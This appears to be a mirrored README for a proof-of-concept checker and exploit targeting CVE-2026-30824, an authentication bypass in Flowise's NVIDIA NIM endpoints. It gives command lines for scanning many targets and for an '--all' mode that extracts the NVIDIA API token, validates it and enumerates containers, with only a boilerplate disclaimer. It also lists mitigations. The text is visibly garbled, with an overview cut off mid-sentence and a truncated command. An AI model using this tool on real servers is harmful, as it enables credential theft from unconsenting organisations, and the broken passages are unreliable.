Share
## https://sploitus.com/exploit?id=42BD4D56-3716-5026-B5B8-1F89FF1FA2B8
# CVE-2026-30824 โ€” Flowise NVIDIA NIM Authentication Bypass Checker and Exploit

A proof-of-concept checker and exploit for **CVE-2026-30824**, a critical authentication bypass vulnerability in Flowise that exposes NVIDIA NIM API endpoints without authentication.

## DISCLAIMER

This tool is for pentesters only to use on authorized networks. Use it at your own risk. No responsability is taken.

## Vulnerability Overview

**CVE-2026-30824** is a critical authentication bypass in Flowise (
cd cve-2026-30824

# Install dependencies
pip install -r requirements.txt
# or
pip install requests
```

---

## Usage

### Basic Vulnerability Check

```bash
# Check if a single target is vulnerable
python3 CVE-2026-30824_exp.py -t http://192.168.1.100:3000 --check

# Expected output (VULNERABLE):
# [+] Target appears VULNERABLE (HTTP 200)
#     Response: {...}
```

### Scan Multiple Targets

```bash
# Create targets.txt with one URL per line
cat > targets.txt "
```

### Scenario 2: Proof of Impact

```bash
# Verify vulnerability and demonstrate full blast radius
python3 CVE-2026-30824_exp.py -t http://192.168.1.100:3000 --all

# This will:
# 1. Check vulnerability
# 2. Extract NVIDIA API token
# 3. Validate token against NVIDIA API
# 4. List running containers
# 5. Show resource enumeration
```

### Scenario 3: Continuous Monitoring

```bash
# Monitor a target periodically (via cron or scheduler)
python3 CVE-2026-30824_exp.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log
```

---

## Output Indicators

### Colors
- ๐ŸŸข **GREEN** โ€” Vulnerable target or successful exploitation
- ๐ŸŸก **YELLOW** โ€” Patched/not vulnerable or warning
- ๐Ÿ”ด **RED** โ€” Error or connection failure

### Status Codes

| HTTP | Meaning |
|------|---------|
| 200 | โœ… Vulnerable (endpoint accessible) |
| 400 | โœ… Vulnerable (application error but endpoint exists) |
| 401 | ๐ŸŸก Patched (authentication required) |
| 404 | ๐ŸŸก Not Flowise or endpoint doesn't exist |
| 5xx | ๐Ÿ”ด Server error/misconfigured |

---

## Troubleshooting

### "Got HTML response instead of JSON"
**Problem:** The endpoint returns an HTML page instead of JSON API response.

**Solutions:**
1. Verify the Flowise version is actually vulnerable (< 3.0.13)
2. Check if the target is actually running Flowise (not a different app)
3. Verify the endpoint path hasn't changed in this version
4. Check if a reverse proxy or WAF is interfering

### "Connection refused" or "Timeout"
**Problem:** Cannot reach the target.

**Solutions:**
```bash
# Test connectivity
curl -v http://192.168.1.100:3000/

# Increase timeout
python3 CVE-2026-30824_exp.py -t http://192.168.1.100:3000 --check --timeout 30
```

### SSL Certificate Error
**Problem:** Target uses self-signed or expired certificate.

**Solution:** The script disables SSL verification by default. If issues persist:
```bash
# Explicitly add port and protocol
python3 CVE-2026-30824_exp.py -t https://192.168.1.100:3000 --check
```

### Token Validation Fails
**Problem:** Token extracted but validation against NVIDIA API fails.

**Causes:**
- Token may have already expired
- Token may be invalid (endpoint returns fake token)
- Network connectivity to NVIDIA API blocked

---

## Security Considerations

โš ๏ธ **LEGAL NOTICE**
- This tool is for authorized security testing only
- Unauthorized access to computer systems is illegal
- Only test systems you own or have explicit permission to test
- The author assumes no liability for misuse

### Responsible Disclosure
If you discover this vulnerability in the wild:
1. Document the findings
2. Contact the organization's security team
3. Allow reasonable time for remediation (typically 90 days)
4. Do not disclose publicly until patched

---

## Mitigation

### For System Administrators

**Immediate:**
1. Upgrade Flowise to version 3.0.13 or later
2. Implement network access controls (firewall rules)
3. Disable NVIDIA NIM integration if not needed
4. Monitor API logs for suspicious token usage

**Long-term:**
1. Use WAF rules to block `/api/v1/nvidia-nim/*` paths
2. Implement API rate limiting
3. Enable security monitoring and alerting
4. Conduct regular security assessments

### For Developers
- Review all authentication bypasses in the codebase
- Implement default-deny access policies
- Add comprehensive API endpoint security tests
- Use automated security scanning in CI/CD

---

## References

- [NVD Entry](https://nvd.nist.gov/)
- [Flowise GitHub](https://github.com/FlowiseAI/Flowise)
- [NVIDIA NIM Documentation](https://docs.nvidia.com/nim/)
- [CWE-306: Missing Authentication](https://cwe.mitre.org/data/definitions/306.html)

---

## License

This tool is provided for educational and authorized security testing purposes only. See LICENSE file for details.

## Disclaimer

This exploit is provided "as-is" without warranty. Use only on systems you own or have explicit written permission to test. The author is not responsible for any misuse or damage caused by this tool.

---

## Author

Created for authorized penetration testing and security research.

**Last Updated:** April 2026